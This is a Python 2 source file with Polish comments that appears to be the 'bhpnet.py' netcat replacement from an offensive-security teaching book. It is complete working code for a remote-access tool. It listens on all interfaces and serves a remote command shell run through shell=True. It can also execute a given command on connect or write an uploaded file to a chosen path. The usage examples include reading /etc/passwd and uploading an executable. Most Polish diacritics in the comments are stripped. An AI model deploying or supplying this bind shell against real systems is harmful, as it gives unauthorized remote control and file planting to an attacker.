# -*- coding: utf-8 -*-
#!/opt/local/bin/python2.7

import sys
import socket
import getopt
import threading
import subprocess


# definicje zmiennych globalnych
listen             = False
command            = False
upload             = False
execute            = ""
target             = ""
upload_destination = ""
port               = 0

# uruchamia polecenie i zwraca wynik
def run_command(command):
        
        # usuwa znak nowego wiersza
        command = command.rstrip()
        
        # uruchamia polecenie i odbiera wynik
        try:
                output = subprocess.check_output(command,stderr=subprocess.STDOUT, shell=True)
        except:
                output = "Nie udao si wykona polecenia.\r\n"
        
        # wysya wynik do klienta
        return output

# obsuguje przychodzce poczenia od klientw
def client_handler(client_socket):
        global upload
        global execute
        global command
        
        # sprawdzenie czy co jest wysyane
        if len(upload_destination):
                
                # wczytanie wszystkich bajtw i zapis ich w miejscu docelowym
                file_buffer = ""
                
                # wczytywanie danych do koca
                while True:
                        data = client_socket.recv(1024)
                        
                        if not data:
                                break
                        else:
                                file_buffer += data
                                
                # prba zapisania wczytanych bajtw
                try:
                        file_descriptor = open(upload_destination,"wb")
                        file_descriptor.write(file_buffer)
                        file_descriptor.close()
                        
                        # potwierdzenie zapisania pliku
                        client_socket.send("Zapisano plik w %s\r\n" % upload_destination)
                except:
                        client_socket.send("Nie udao si zapisa pliku w %s\r\n" % upload_destination)
                        
                
        
        # sprawdzenie czy wykonano polecenie
        if len(execute):
                
                # wykonanie polecenia
                output = run_command(execute)
                
                client_socket.send(output)
        
        
        # jeli zadano wiersza polece, przechodzimy do innej ptli
        if command:
                
                while True:
                        # wywietlenie prostego wiersza polece
                        client_socket.send("<BHP:#> ")
                        
                        # pobieramy tekst do napotkania znaku nowego wiersza nacinicie klawisza Enter)
                        cmd_buffer = ""
                        while "\n" not in cmd_buffer:
                                cmd_buffer += client_socket.recv(1024)
                
                        
                        # mamy poprawne polecenie, wic je wykonujemy i odsyamy wynik
                        response = run_command(cmd_buffer)
                        
                        # odesanie wyniku
                        client_socket.send(response)
        
# dla pocze przychodzcych
def server_loop():
        global target
        global port
        
        # jeli nie ma zdefiniowanego celu, nasuchujemy na wszystkich interfejsach
        if not len(target):
                target = "0.0.0.0"
                
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.bind((target,port))
        
        server.listen(5)        
        
        while True:
                client_socket, addr = server.accept()
                
                # wtek do obsugi naszego nowego klienta
                client_thread = threading.Thread(target=client_handler,args=(client_socket,))
                client_thread.start()
                

# jeli nie nasuchujemy, to jestemy klientem
def client_sender(buffer):
        
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                
        try:
                # poczenie z docelowym hostem
                client.connect((target,port))
                
                # jeli wykryjemy dane w stdin, to je wysyamy
                # jeli nie, to czekamy a uytkownik co wpisze
                
                if len(buffer):
                        
                        client.send(buffer)
                
                while True:
                        
                        # czekamy na zwrot danych
                        recv_len = 1
                        response = ""
                        
                        while recv_len:
                                data     = client.recv(4096)
                                recv_len = len(data)
                                response+= data
                                
                                if recv_len < 4096:
                                        break
                        
                        print response, 
                        
                        # czekamy na wicej danych
                        buffer = raw_input("")
                        buffer += "\n"                        
                        
                        # wysyamy dane
                        client.send(buffer)
                        
                
        except:
                # przechwytujemy oglne bdy - moesz to udoskonali w ramach pracy domowej
                print "[*] Wyjtek! Zamykanie."
                
                # zamknicie poczenia                  
                client.close()  
                        
                        
        

def usage():
        print "Zastpstwo dla netcata"
        print
        print "Sposb uycia: bhpnet.py -t target_host -p port"
        print "-l --listen                - nasuchuje na [host]:[port] przychodzcych pocze"
        print "-e --execute=file_to_run   - wykonuje dany plik, gdy zostanie nawizane poczenie"
        print "-c --command               - inicjuje wiersz polece"
        print "-u --upload=destination    - po nawizaniu poczenia wysya plik i zapisuje go w [destination]"
        print
        print
        print "Przykady: "
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
        print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
        print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
        sys.exit(0)


def main():
        global listen
        global port
        global execute
        global command
        global upload_destination
        global target
        
        if not len(sys.argv[1:]):
                usage()
                
        # wczytanie opcji wiersza polece options
        try:
                opts, args = getopt.getopt(sys.argv[1:],"hle:t:p:cu:",["help","listen","execute","target","port","command","upload"])
        except getopt.GetoptError as err:
                print str(err)
                usage()
                
                
        for o,a in opts:
                if o in ("-h","--help"):
                        usage()
                elif o in ("-l","--listen"):
                        listen = True
                elif o in ("-e", "--execute"):
                        execute = a
                elif o in ("-c", "--commandshell"):
                        command = True
                elif o in ("-u", "--upload"):
                        upload_destination = a
                elif o in ("-t", "--target"):
                        target = a
                elif o in ("-p", "--port"):
                        port = int(a)
                else:
                        assert False,"Nieobsugiwana opcja"
        

        # Bdziemy nasuchiwa czy tylko wysya dane z stdin?
        if not listen and len(target) and port > 0:
                
                # wczytuje bufor z wiersza polece
                # to powoduje blokad, wic wylij CTRL-D, gdy nie wysyasz danych
                # do stdin
                buffer = sys.stdin.read()
                
                # wysya dane
                client_sender(buffer)   
        
        # bdziemy nasuchiwa i ewentualnie
        # co wysya, wykonywa polecenia oraz wcza powok
        # w zalenoci od opcji wiersza polece
        if listen:
                server_loop()

main()       